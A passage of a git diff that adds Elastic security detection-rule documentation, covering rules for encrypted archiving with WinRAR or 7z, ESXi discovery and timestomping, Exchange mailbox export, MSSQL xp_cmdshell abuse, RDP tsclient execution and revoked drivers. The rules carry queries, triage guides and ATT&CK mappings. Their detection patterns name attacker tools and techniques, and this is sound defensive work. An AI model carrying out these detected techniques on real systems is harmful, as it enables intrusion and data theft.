<<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Encrypting Files with WinRar or 7z + +Attackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less apparent upon inspection by a defender. + +These steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages. + +#### Possible investigation steps + +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Retrieve the encrypted file. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check if the password used in the encryption was included in the command line. +- Decrypt the `.rar`/`.zip` and check if the information is sensitive. +- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the file names included in the encrypted file. +- Investigate if the file was transferred to an attacker-controlled server. + +### False positive analysis + +- Backup software can use these utilities. Check the `process.parent.executable` and `process.parent.command_line` fields to determine what triggered the encryption. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Prioritize cases that involve personally identifiable information (PII) or other classified data. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ((process.name:"rar.exe" or process.code_signature.subject_name == "win.rar GmbH" or + process.pe.original_file_name == "Command line RAR") and + process.args == "a" and process.args : ("-hp*", "-p*", "-dw", "-tb", "-ta", "/hp*", "/p*", "/dw", "/tb", "/ta")) + + or + (process.pe.original_file_name in ("7z.exe", "7za.exe") and + process.args == "a" and process.args : ("-p*", "-sdel")) + + /* uncomment if noisy for backup software related FPs */ + /* not process.parent.executable : ("C:\\Program Files\\*.exe", "C:\\Program Files (x86)\\*.exe") */ +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Archive Collected Data +** ID: T1560 +** Reference URL: https://attack.mitre.org/techniques/T1560/ +* Sub-technique: +** Name: Archive via Utility +** ID: T1560.001 +** Reference URL: https://attack.mitre.org/techniques/T1560/001/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc new file mode 100644 index 0000000000..d150d39d54 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc @@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-enumeration-of-kernel-modules]] +=== Enumeration of Kernel Modules + +Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 206 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and ( + (process.name:(lsmod or modinfo)) or + (process.name:kmod and process.args:list) or + (process.name:depmod and process.args:(--all or -a)) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc new file mode 100644 index 0000000000..75a134219c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc @@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-esxi-discovery-via-find]] +=== ESXI Discovery via Find + +Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and process.name : "find" and +process.args : ("/etc/vmware/*", "/usr/lib/vmware/*", "/vmfs/*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Software Discovery +** ID: T1518 +** Reference URL: https://attack.mitre.org/techniques/T1518/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc new file mode 100644 index 0000000000..21df2bc928 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc @@ -0,0 +1,63 @@ +[[prebuilt-rule-8-10-5-esxi-discovery-via-grep]] +=== ESXI Discovery via Grep + +Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name in ("grep", "egrep", "pgrep") and +process.args in ("vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", "vmem") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Software Discovery +** ID: T1518 +** Reference URL: https://attack.mitre.org/techniques/T1518/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc new file mode 100644 index 0000000000..6b65b1585b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc @@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command]] +=== ESXI Timestomping using Touch Command + +Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and +process.name : "touch" and process.args : "-r" and process.args : ("/etc/vmware/*", "/usr/lib/vmware/*", "/vmfs/*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ +* Sub-technique: +** Name: Timestomp +** ID: T1070.006 +** Reference URL: https://attack.mitre.org/techniques/T1070/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc new file mode 100644 index 0000000000..0ecbd15af9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell]] +=== Exchange Mailbox Export via PowerShell + +Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps +* https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Exchange Mailbox Export via PowerShell + +The `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange. +Attackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the export operation: + - Identify the user account that performed the action and whether it should perform this kind of action. + - Contact the account owner and confirm whether they are aware of this activity. + - Check if this operation was approved and performed according to the organization's change management policy. + - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests. + - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the "Mailbox Import Export" privilege for abnormal activity. +- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export. +- If the operation was completed successfully: + - Check if the file is on the path specified in the command. + - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior. +- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests. +- Prioritize cases that involve personally identifiable information (PII) or other classified data. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Review the privileges of users with the "Mailbox Import Export" privilege to ensure that the least privilege principle is being followed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : "New-MailboxExportRequest" and + not ( + file.path : ( + ?\:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Exchange\\\\RemotePowerShell\\\\* + ) and file.name:(*.psd1 or *.psm1) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ +* Sub-technique: +** Name: Local Email Collection +** ID: T1114.001 +** Reference URL: https://attack.mitre.org/techniques/T1114/001/ +* Sub-technique: +** Name: Remote Email Collection +** ID: T1114.002 +** Reference URL: https://attack.mitre.org/techniques/T1114/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc new file mode 100644 index 0000000000..0ef15386a0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure]] +=== Execution via MSSQL xp_cmdshell Stored Procedure + +Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Execution via MSSQL xp_cmdshell Stored Procedure + +Microsoft SQL Server (MSSQL) has procedures meant to extend its functionality, the Extended Stored Procedures. These procedures are external functions written in C/C++; some provide interfaces for external programs. This is the case for xp_cmdshell, which spawns a Windows command shell and passes in a string for execution. Attackers can use this to execute commands on the system running the SQL server, commonly to escalate their privileges and establish persistence. + +The xp_cmdshell procedure is disabled by default, but when used, it has the same security context as the MSSQL Server service account, which is often privileged. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the command line to determine if the command executed is potentially harmful or malicious. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. + +### False positive analysis + +- This mechanism can be used legitimately, but it brings inherent risk. The security team must monitor any activity of it. If recurrent tasks are being executed using this mechanism, consider adding exceptions — preferably with a full command line. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Ensure that SQL servers are not directly exposed to the internet. If there is a business justification for such, use an allowlist to allow only connections from known legitimate sources. +- Disable the xp_cmdshell stored procedure. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "sqlservr.exe" and + ( + (process.name : "cmd.exe" and + not process.args : ("\\\\*", "diskfree", "rmdir", "mkdir", "dir", "del", "rename", "bcp", "*XMLNAMESPACES*", + "?:\\MSSQL\\Backup\\Jobs\\sql_agent_backup_job.ps1", "K:\\MSSQL\\Backup\\msdb", "K:\\MSSQL\\Backup\\Logins")) or + + (process.name : "vpnbridge.exe" or process.pe.original_file_name : "vpnbridge.exe") or + + (process.name : "certutil.exe" or process.pe.original_file_name == "CertUtil.exe") or + + (process.name : "bitsadmin.exe" or process.pe.original_file_name == "bitsadmin.exe") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: SQL Stored Procedures +** ID: T1505.001 +** Reference URL: https://attack.mitre.org/techniques/T1505/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc new file mode 100644 index 0000000000..cb31d26421 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint]] +=== Execution via TSClient Mountpoint + +Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and process.executable : "\\Device\\Mup\\tsclient\\*.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc new file mode 100644 index 0000000000..722035ad93 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc @@ -0,0 +1,75 @@ +[[prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded]] +=== Expired or Revoked Driver Loaded + +Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +driver where host.os.type == "windows" and process.pid == 4 and + dll.code_signature.status : ("errorExpired", "errorRevoked") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc new file mode 100644 index 0000000000..fef639d1c1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc @@ -0,0 +1,137 @@ +[[prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell]] +=== Exporting Exchange Mailbox via PowerShell + +Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ +* https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Exporting Exchange Mailbox via PowerShell + +Email mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors. + +The `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange. + +Attackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate the export operation: + - Identify the user account that performed the action and whether it should perform this kind of action. + - Contact the account owner and confirm whether they are aware of this activity. + - Check if this operation was approved and performed according to the organization's change management policy. + - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests. + - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the "Mailbox Import Export" privilege for abnormal activity. +- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export. +- If the operation was completed successfully: + - Check if the file is on the path specified in the command. + - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior. +- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests. +- Prioritize cases that involve personally identifiable information (PII) or other classified data. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Review the privileges of users with the "Mailbox Import Export" privilege to ensure that the least privilege principle is being followed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + process.command_line : ("*MailboxExportRequest*", "*-Mailbox*-ContentFilter*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ +* Technique: +** Name: Email Collection +** ID: T1114 +** Reference URL: https://attack.mitre.org/techniques/T1114/ +* Sub-technique: +** Name: Remote Email Collection +** ID: T1114.002 +** Reference URL: https://attack.mitre.org/techniques/T1114/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: 